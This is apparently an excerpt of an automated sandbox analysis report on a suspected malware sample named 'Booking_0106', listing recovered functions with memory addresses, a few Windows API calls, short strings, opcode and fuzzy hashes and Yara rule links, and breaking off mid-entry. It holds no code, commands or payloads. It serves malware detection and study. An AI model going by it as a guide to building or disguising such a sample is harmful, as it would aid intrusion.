Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06BD926B
$^q, xrefs: 06BD9230
$^q, xrefs: 06BD923C
$^q, xrefs: 06BD9277

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: d87e55e5cc590b1b12fe1b2cde09e80a454ee9fad3dc6e6cb449e9b109249cb4
Instruction ID: 2691431c7b8126efa5e47aa35a97ccc71934ae5284a53042d3bd639909c91711
Opcode Fuzzy Hash: d87e55e5cc590b1b12fe1b2cde09e80a454ee9fad3dc6e6cb449e9b109249cb4
Instruction Fuzzy Hash: B5914F70F0020A9FDB94DB65D9507AEB3F6EBC8204F1085A9C409EB384EF74DD868B91

Function 06BDCFB8 Relevance: 4.6, Strings: 3, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06BDD3C3
$^q, xrefs: 06BDD3B7
$^q, xrefs: 06BDD3AF

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: b069e7c023e636f063045c11f309db31573ece9db4e4a616f1017c225590fefb
Instruction ID: 3de1459bc790a97ac2ea4a0f90df1c346be5644520e7dd9e294c38cf85f130e3
Opcode Fuzzy Hash: b069e7c023e636f063045c11f309db31573ece9db4e4a616f1017c225590fefb
Instruction Fuzzy Hash: 5E624070B006068FCB55EF68D590A5EB7B2FF84314F208A69D0499F355EB75ED8ACB80

Function 06BD4C10 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 06BD4D61
\Ocq, xrefs: 06BD4DEB
fcq, xrefs: 06BD4C3B

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 59776cd93f8ea565aaacf3a418f79fcde75aa1fef2eea0ad9e206484a061d596
Instruction ID: db9b466c8d0f3ffde34901dbd04df7b2e087a9d0d4b6d222f472c6c203d37c8d
Opcode Fuzzy Hash: 59776cd93f8ea565aaacf3a418f79fcde75aa1fef2eea0ad9e206484a061d596
Instruction Fuzzy Hash: AF61A370F102099FDB549FA9D8547AEBBF7FB88700F208469D10AAB391DB754C458F91

Function 06BD91B3 Relevance: 2.7, Strings: 2, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06BD926B
$^q, xrefs: 06BD9230

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 52df9cc8f11ec8bf009e8e6fd1d7afd12a11a345dc9918df25bb7fffc8a7c1ce
Instruction ID: d006f1cf8cf64f487e0eeb8f338ef929f8378b4f5444892be651b66cbdb07243
Opcode Fuzzy Hash: 52df9cc8f11ec8bf009e8e6fd1d7afd12a11a345dc9918df25bb7fffc8a7c1ce
Instruction Fuzzy Hash: D5514D70B001059FDB94EB79E990B6EB3F6EBC8604F108569D409EB384EF75DC828B95

Function 06BD4C00 Relevance: 2.6, Strings: 2, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 06BD4D61
fcq, xrefs: 06BD4C3B

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: 134ed75a871f365fe1d050881dec795a418806a465d286037b84f2802e6f886b
Instruction ID: 0e7a9b0bb23526b22f607c4fd18f727d4602950cfc0c7c470cb2dd4227b51c37
Opcode Fuzzy Hash: 134ed75a871f365fe1d050881dec795a418806a465d286037b84f2802e6f886b
Instruction Fuzzy Hash: 0C518D70F002189FDB549FB9C854BAEBAF7EF88700F208569D10AAB395DB758C458F91

Function 06BCB318 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2989547741.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bc0000_Booking_0106.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 19ac89e78c8cfa86e0d8ddf59b2ac5e3209962a4a8255626b21e725780e64411
Instruction ID: 89c04bdac8b4fbad1b0c84f25d69bf2a68385a89f2b8ba4c649cf71e45adf8a8
Opcode Fuzzy Hash: 19ac89e78c8cfa86e0d8ddf59b2ac5e3209962a4a8255626b21e725780e64411
Instruction Fuzzy Hash: 028143B0A00B048FD7A4DF2AD45575ABBF1FF88310F008A6DD48AD7A50DB75EA45CB91

Function 02E8E9A0 Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2961866791.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e80000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 430d1f144ba592e95adec43c934189ab76fc9e8eb036e155cfc23f65b1de1441
Instruction ID: 26f4ef92630d7448ddc31b6c4273fc12d85d770fa566fc57ce5437c9de93c540
Opcode Fuzzy Hash: 430d1f144ba592e95adec43c934189ab76fc9e8eb036e155cfc23f65b1de1441
Instruction Fuzzy Hash: 76412372E043958FCB14DFB9D8142AEBBF1AF89310F1885AAE448E7251DB749844CBD1

Function 06BCD4E4 Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BCD602

Memory Dump Source

Source File: 00000002.00000002.2989547741.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bc0000_Booking_0106.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ca5a48c9fb222f634793153468fe8683ef30d19f8fa7a888afbaba6e7ac3902e
Instruction ID: 1a8443e466bc9e22bb35d1365234e5063fa23518caff06ed0f460ddc55f559f3
Opcode Fuzzy Hash: ca5a48c9fb222f634793153468fe8683ef30d19f8fa7a888afbaba6e7ac3902e
Instruction Fuzzy Hash: 7551DFB5D103499FDB14CFA9C884ADEBBB5FF48310F24852AE819AB210D771A985CF91

Function 06BCD4F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BCD602

Memory Dump Source

Source File: 00000002.00000002.2989547741.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bc0000_Booking_0106.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6fe76414d300bc14bcc326258b5f6c67b9dea348e03f681b52cf2ef383df67e6
Instruction ID: 8649d13af5d733a23bb439245762ecce0aadae05a73042b4832eaf5e6d5c3126
Opcode Fuzzy Hash: 6fe76414d300bc14bcc326258b5f6c67b9dea348e03f681b52cf2ef383df67e6
Instruction Fuzzy Hash: C141C0B5D103499FDB14CF99C884ADEBBB5FF48314F24852AE819AB210D7709945CF91

Function 06BCE46C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06BCFCF1

Memory Dump Source

Source File: 00000002.00000002.2989547741.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bc0000_Booking_0106.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 4dfb54e32215123407f76de4048f0b6e43f9553308646b2da9ade06ddcb3e670
Instruction ID: 8d2aeb859c3d45496924390648b64ec46d77dcf98aaedcf115e4d3ac57c9ac6f
Opcode Fuzzy Hash: 4dfb54e32215123407f76de4048f0b6e43f9553308646b2da9ade06ddcb3e670
Instruction Fuzzy Hash: 374129B5A00209DFDB54DF99C848AAABBF5FF88324F24C49DD559A7321C734A941CFA0

Function 06BC3048 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BC30D7

Memory Dump Source

Source File: 00000002.00000002.2989547741.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bc0000_Booking_0106.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9605aa5b097e533efa1eb3b56591c4cc075ceca06aa23fdd84060718d8818f9a
Instruction ID: e634baddac10a2e8a7fc2c7286b878674633eabf8746c7458fd1b71421b08899
Opcode Fuzzy Hash: 9605aa5b097e533efa1eb3b56591c4cc075ceca06aa23fdd84060718d8818f9a
Instruction Fuzzy Hash: FA2103B5D00258DFDB10CF9AD884AEEBBF4EB48320F14801AE959A3310D378A940CFA0

Function 06BC3050 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BC30D7

Memory Dump Source

Source File: 00000002.00000002.2989547741.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bc0000_Booking_0106.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 828ede47ab69a83993aa950a8e9d1fde874bb3a4288b60c0a5abdd64f867c013
Instruction ID: e04a7174f59097ac4792228adcebc54bd21322d2dc1a5a9c67432aa7e029cbdf
Opcode Fuzzy Hash: 828ede47ab69a83993aa950a8e9d1fde874bb3a4288b60c0a5abdd64f867c013
Instruction Fuzzy Hash: 2921E4B5900258DFDB10CF9AD984ADEFBF8FB48320F14841AE958A3310C375A940CFA5

Function 02E8EA88 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 02E8EAEF

Memory Dump Source

Source File: 00000002.00000002.2961866791.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e80000_Booking_0106.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 6f31a45527ceb653027401f60872cf5f4711116e52904fa965394be3c51f38f8
Instruction ID: f5bff9c2dd3319b9bee82d340c6ff67a882339c987a04316164cf5ff50aa1d2d
Opcode Fuzzy Hash: 6f31a45527ceb653027401f60872cf5f4711116e52904fa965394be3c51f38f8
Instruction Fuzzy Hash: 631112B1C002699BCB10DF9AC544BDEFBF4BB48324F14816AE858A7241D378A940CFA5

Function 06BCA2AC Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06BCB334), ref: 06BCB56E

Memory Dump Source

Source File: 00000002.00000002.2989547741.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bc0000_Booking_0106.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 60985360ceccbb125e1fced7fbe7e70cb45fb4d20856867924cc0a2984db95ae
Instruction ID: 706071f2bf673299d932cb1c313b6867143e5c65a45b3056ca9b770a376c16ce
Opcode Fuzzy Hash: 60985360ceccbb125e1fced7fbe7e70cb45fb4d20856867924cc0a2984db95ae
Instruction Fuzzy Hash: 121132B1C00249CFDB10CF9AC844ADEFBF8EB48320F14846AD959B7210D375A644CFA1

Function 06BDDB2D Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06BDDC89

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 21d92bbcbf67a349ac4d5ac28ecf261a84f28eed80c30795ddd15c65fcdd6686
Instruction ID: a85654b9f5fe09f19bc2fcd004cfb3e3dd526af91ffd0da20b115b8c11e63c66
Opcode Fuzzy Hash: 21d92bbcbf67a349ac4d5ac28ecf261a84f28eed80c30795ddd15c65fcdd6686
Instruction Fuzzy Hash: 5941AFB0E0020ADFDB55DF64C45469EBBB2FF85304F24496AD445EB380EBB4E946CB91

Function 06BD2290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06BD23CB

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 7eb6645bcb448557c2d4206a43e560245f4aef0babd6811165afb7fcb631c41c
Instruction ID: 6628d34c1f924678fd24b926aff0ec873dd030f32e98594644ba9a9ad2190d0b
Opcode Fuzzy Hash: 7eb6645bcb448557c2d4206a43e560245f4aef0babd6811165afb7fcb631c41c
Instruction Fuzzy Hash: 6B31EF70B002068FDB599B74C55466F7BA3EBC9310F204968D506DB380EE35DE86CBE5

Function 06BD8340 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

$^q, xrefs: 06BD838B

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: bf3a10d7a1fcef46221b42790696d8b0f1ed182179afcab717a97317c9ff77e9
Instruction ID: ff039566b7e92bd362fa55b1f1f2d3a72ac70f3a845af2ace1ec0bb99a4dc682
Opcode Fuzzy Hash: bf3a10d7a1fcef46221b42790696d8b0f1ed182179afcab717a97317c9ff77e9
Instruction Fuzzy Hash: 01F0D1B5E002008FDFB48E45E94166C73A5EB40326F1040B5E80D8F240E635DD46CB51

Function 06BD4330 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94297668bc57bf2fdc5cb51cf0f3620500c014588e92bf4633c41bf012cebd5c
Instruction ID: 147c32aa58e7ad59f06e2ba9acdff1d8040f29219ea80a254767d03ae89ef6da
Opcode Fuzzy Hash: 94297668bc57bf2fdc5cb51cf0f3620500c014588e92bf4633c41bf012cebd5c
Instruction Fuzzy Hash: BA818C71B002098FDF54DFA8D59469EB7F2EF89304F108569D40AEB395EB34DC868B92

Function 06BD6268 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52963ba19473eefdabcc1a7fd74112a58c12280e99736b11d0a87178a9805fd9
Instruction ID: 45867d057eb9f47bbe70b2512b1f0c37c7f6018e0ce4912028fd0f900425707e
Opcode Fuzzy Hash: 52963ba19473eefdabcc1a7fd74112a58c12280e99736b11d0a87178a9805fd9
Instruction Fuzzy Hash: FC61CFB1F000214FCB549A7EC894A6FAAD7EFC5624F25407AD80EDB360EE65DD0287C6

Function 06BD4660 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b5e9644bed2636037c88ec537504a4c412ec0995bc12487cfb50eb5465e4fd
Instruction ID: a8aa30500ebdf10b57d16747be9f07a8655ec6d4c10718960827bd377ee21675
Opcode Fuzzy Hash: e1b5e9644bed2636037c88ec537504a4c412ec0995bc12487cfb50eb5465e4fd
Instruction Fuzzy Hash: A3914D70E102198FDF60DF68C990B9DB7B2FF85300F208599D449AB255EB70AE858F91

Function 06BDAF98 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c808181cd4b39ea0bd0cb01d401b918de4e95309c83ed805332f074f12700648
Instruction ID: 1d558375bcf73fcaa88459adb8bb0ffa60c65c7d3bcb6b3ad202af0074b86295
Opcode Fuzzy Hash: c808181cd4b39ea0bd0cb01d401b918de4e95309c83ed805332f074f12700648
Instruction Fuzzy Hash: 19717C71E0031A8FCF54DFA9D4506AEB7B2FF85304F108569D409AF394EB74E8868B81

Function 06BD4678 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26c104a9f32f689f71c4f7d957c55366e51813fe039a141750768b9e34a46174
Instruction ID: 15c0768d99e1509a3defc56a3d21821a0cece3f57ee6c1eaf43ff2b615d0d9bb
Opcode Fuzzy Hash: 26c104a9f32f689f71c4f7d957c55366e51813fe039a141750768b9e34a46174
Instruction Fuzzy Hash: 0D913C70E102198BDF60DF68C890B9DB7B2FF89300F208599D54DAB355EB71AE858F91

Function 06BDEB8A Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b181db4d1dcf6968dc7f9c396697599dc93ca6662b090b7f564d19c9f8f04ad4
Instruction ID: f870144337d54fafd769c31114fd26895d37f14a6a028cd7a01f9c750707a3fa
Opcode Fuzzy Hash: b181db4d1dcf6968dc7f9c396697599dc93ca6662b090b7f564d19c9f8f04ad4
Instruction Fuzzy Hash: 71711975A002489FCB54DFA8D990A9EBBF6EF84304F248469D009EF354EB30ED46CB50

Function 06BDEB98 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac3e3da2383ceb1b201bd9ac06deabeb3e2c7c283d90430a0a586aedc2cdc7d
Instruction ID: 3974eb8ef8a1fd058ad7594287e587cca5010bd59b991f2a5c5d9d767b8f5988
Opcode Fuzzy Hash: 8ac3e3da2383ceb1b201bd9ac06deabeb3e2c7c283d90430a0a586aedc2cdc7d
Instruction Fuzzy Hash: 6D710870A006089FDB54DFA9D990A9EBBF6EF84304F248469D409EF354EB30ED46CB50

Function 06BDFCF7 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b75aaabcce67e4f642df67e39b1bbca4ba39ad6d48e7a9697d79d39906ebba
Instruction ID: 7c594a319d84e65b0684fd0a27fecff61c9fc07bb345097891271bd0536e2985
Opcode Fuzzy Hash: b6b75aaabcce67e4f642df67e39b1bbca4ba39ad6d48e7a9697d79d39906ebba
Instruction Fuzzy Hash: 4351EEB1E05106DFCB54EFB8E4446ADBBB6EF85315F2088B9E10ADB250EB358855CB81

Function 06BDFAA9 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7169066a06bef99192d15ec18d08c31a88e0fd6925066438ddaef8110a3f728e
Instruction ID: 4010a753182379c9cd91341257e26d7c008b057f9bcb46fcc6124d5853b6e475
Opcode Fuzzy Hash: 7169066a06bef99192d15ec18d08c31a88e0fd6925066438ddaef8110a3f728e
Instruction Fuzzy Hash: 6D51D0B0B142049FEF645ABCD99473F265EDB89300F24487AE40BEB3D5D92DCC9583A2

Function 06BDFAB8 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c2d977b103d24d3287cf98954003559e927beca4bf54b81cb510f1e012b9ad0
Instruction ID: 2f17dba9a74dfebee6865385263c516580a8502daa4ffbcb72b8b54439274fe5
Opcode Fuzzy Hash: 6c2d977b103d24d3287cf98954003559e927beca4bf54b81cb510f1e012b9ad0
Instruction Fuzzy Hash: 0C51A2B0F142049BEF645ABCD95473F265EDB89310F24483AE50BEB3D4D96DCC9583A2

Function 06BD54B8 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbd28213d52d8ce6564760c68f7797dfe0832aa78ebc2a6fe7c939c98e5b9167
Instruction ID: cf88dbc383a05d2ac40f2a03fdc0957f33e2b6d0ffc3fc1afc96280785241f6b
Opcode Fuzzy Hash: dbd28213d52d8ce6564760c68f7797dfe0832aa78ebc2a6fe7c939c98e5b9167
Instruction Fuzzy Hash: 4C413EB2E006098FDF70CFA9D881BAFF7B2EB44314F10496AD256DB654E330E9558B91

Function 06BD2140 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 412772a61088534378b4cd4532968ebe398d0502f5b6b843b03d8201deb461d6
Instruction ID: d0375a0b6d58577f903bc902e9ba5db7eea64798500253ffb6a8ae8576116a9f
Opcode Fuzzy Hash: 412772a61088534378b4cd4532968ebe398d0502f5b6b843b03d8201deb461d6
Instruction Fuzzy Hash: 8031AF76E102069BCB44CFA5D844A9EB7B6FF89300F14C528E906EB340EB70ED46CB91

Function 06BD2150 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d2664303bba791db3d46016e7c529b19353080d83f894a7f26e56e8f80af0f7
Instruction ID: 0a0d367f7fce89d84214f839c705c2fbbfe458937adbf8cd96e2a0a066976d15
Opcode Fuzzy Hash: 7d2664303bba791db3d46016e7c529b19353080d83f894a7f26e56e8f80af0f7
Instruction Fuzzy Hash: 1E31AE71E102069BDB48CFA5D854A9EB7B6FF89300F10C529E906EB340EB71ED46CB91

Function 06BD3B41 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42d9d08685df481105b8a4dcae38508c38fcf60c2afc03c8da746697286cb81
Instruction ID: c840ca26e455ebfcd8e19e0f7b7c3d63d63d878604462df08a41479e28f4f4eb
Opcode Fuzzy Hash: e42d9d08685df481105b8a4dcae38508c38fcf60c2afc03c8da746697286cb81
Instruction Fuzzy Hash: CA21BCB5E00215AFDB00CF79D840AAEBBF5EB49710F048065E906EB381EB74D9818F96

Function 06BD3B50 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddfd973e4daa02c45af746a4b53750e2b9acdbfc716e6ff3aa695d1ede39318c
Instruction ID: 609f83605b26db0b73e5cb17fc6f24d765b4dfff80a3e368c7743d44a1346bf4
Opcode Fuzzy Hash: ddfd973e4daa02c45af746a4b53750e2b9acdbfc716e6ff3aa695d1ede39318c
Instruction Fuzzy Hash: 6721AEB1F002159FDB40CF69D880AAEBBF1EB48710F148065E90AEB381E774DD818F96

Function 02DAD4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2960961914.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dad000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12bc383e6e8b1413d6b087a43ec5d7c75e3f70da47c71171e098d4fa92629c02
Instruction ID: a936e5e2371cbba3de0b0e846cd8c12ec61d6fa54e1e42d101919fb282f9354e
Opcode Fuzzy Hash: 12bc383e6e8b1413d6b087a43ec5d7c75e3f70da47c71171e098d4fa92629c02
Instruction Fuzzy Hash: FB212271504200DFDB05DF14D9C4F2ABFA6FB88328F248569E90A4B75AC336D856CAA2

Function 02DBD030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2961100459.0000000002DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2dbd000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6773d68787ba4697a9db40721e975f3f86c51dc4386b688f9d6cd6797edcb406
Instruction ID: c22c1f76b84e9bd33d1acf67e081471bcfc991f55e5df534faf28135daee2441
Opcode Fuzzy Hash: 6773d68787ba4697a9db40721e975f3f86c51dc4386b688f9d6cd6797edcb406
Instruction Fuzzy Hash: A321F271504204DFDB16DF14D9D0B66BBA6EF84314F34C56DE84A4B356C33AD846CA62

Function 02DBD005 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

